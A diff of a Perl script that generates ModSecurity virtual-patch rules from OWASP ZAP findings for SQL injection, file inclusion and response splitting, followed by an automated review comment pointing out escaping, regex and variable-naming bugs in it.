+ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/SQL_INJECTION.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\"";
+
+ print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n";
+ print "$VULN_CLASS_SQLI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n";
+ $num_rules_generated++;
+
+
+ }
+ }
+ }
+ }
+
+ case ($VULN_CLASS_BLIND_SQLI)
+ {
+
+ if($uricontent ne "" && @params){
+ foreach(@params){
+ if($_ ne ""){
+ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/SQL_INJECTION.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\"";
+
+ print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n";
+ print "$VULN_CLASS_SQLI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n";
+ $num_rules_generated++;
+
+
+ }
+ }
+ }
+ }
+
+ case ($VULN_CLASS_LFI)
+ {
+ if($uricontent ne "" && @params){
+ foreach(@params){
+ if($_ ne ""){
+ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/LFI',tag:'WASCTC/WASC-33',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/LFI.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\"";
+
+ print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n";
+ print "$VULN_CLASS_LFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n";
+ $num_rules_generated++;
+
+
+ }
+ }
+ }
+ }
+
+ case ($VULN_CLASS_RFI)
+ {
+ if($uricontent ne "" && @params){
+ foreach(@params){
+ if($_ ne ""){
+ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/RFI',tag:'WASCTC/WASC-05',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/RFI.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\"";
+
+ print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n";
+ print "$VULN_CLASS_LFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n";
+ $num_rules_generated++;
+
+
+ }
+ }
+ }
+ }
+
+ case ($VULN_CLASS_HTTPRS)
+ {
+ if($uricontent ne "" && @params){
+ foreach(@params){
+ if($_ ne ""){
+ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/RESPONSE_SPLITTING',tag:'WASCTC/WASC-25',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/RESPONSE_SPLITTING.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\"";
+
+ print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n";
+ print "$VULN_CLASS_RFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n";
+ $num_rules_generated++;
+
+
+ }
+ }
+ }
+ }
+
+ }
+}
+
+sub get_uricontent
+{
+ my($url) = @_;
+ my $regex = "http:\/\/+[a-zA-Z0-9.:-]*\/";
+
+ # First, trim the first part out of the URL:
+ # http://.../
+ $url =~ /$regex/;
+ substr($url,index($url,$&),length($&)) = "";
+
+ # If the URL contains a php or cgi query with
+ # one or more params and values, trim those out.
+ # Trim from the question mark to the end.
+ if($url =~ /\?/){
+ substr($url,index($url,"?")) = "";
+ }
+ return $url;
+
+}
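Review bot: In generate_patch, `$uricontent` and the parameter name in `$_` come straight out of the ZAP report and are interpolated unescaped into the generated rule text — into the `REQUEST_FILENAME \"$uricontent\"` operator argument and into the regex `\/XSS.*ARGS:$_\/` (the same shape in every `case`) — so a URL or parameter name containing `"`, `'` or regex metacharacters yields a rule that fails to load or matches something other than the intended request; escape before building the rule, e.g. `my $param_re = quotemeta($_);` and `(my $uri_q = $uricontent) =~ s/(["\\])/\\$1/g;`, and interpolate those instead. In get_uricontent the pattern `http:\/\/+[a-zA-Z0-9.:-]*\/` only strips an `http://` prefix and the match result is never checked, so for an https URL the `substr(...$&...)` edit operates on a stale or undefined `$&` and the rule is built against a value that still carries scheme and host; `https?:\/\/` plus `return $url unless $url =~ /$regex/;` would cover both. The file has no `use strict`/`use warnings` (only `-T`), which is why `print URL_LIST ...` on a handle that is not opened anywhere in this hunk, `$type` in the "not supported" message (the array is `@type`, the loop variable is `$current_type`), and `$VULN_CLASS_BLIND_SQLI`, `$VULN_CLASS_PRL` and `$VULN_CLASS_DI`, which are never assigned in this file, all pass silently. `$VULN_CLASS_SQLI_FINGERPRINT` is listed in `@supported_vulns` but has no `case`, so those alerts are counted as processed yet produce no rule, and the RFI and HTTPRS branches print the LFI and RFI class names respectively in their success messages.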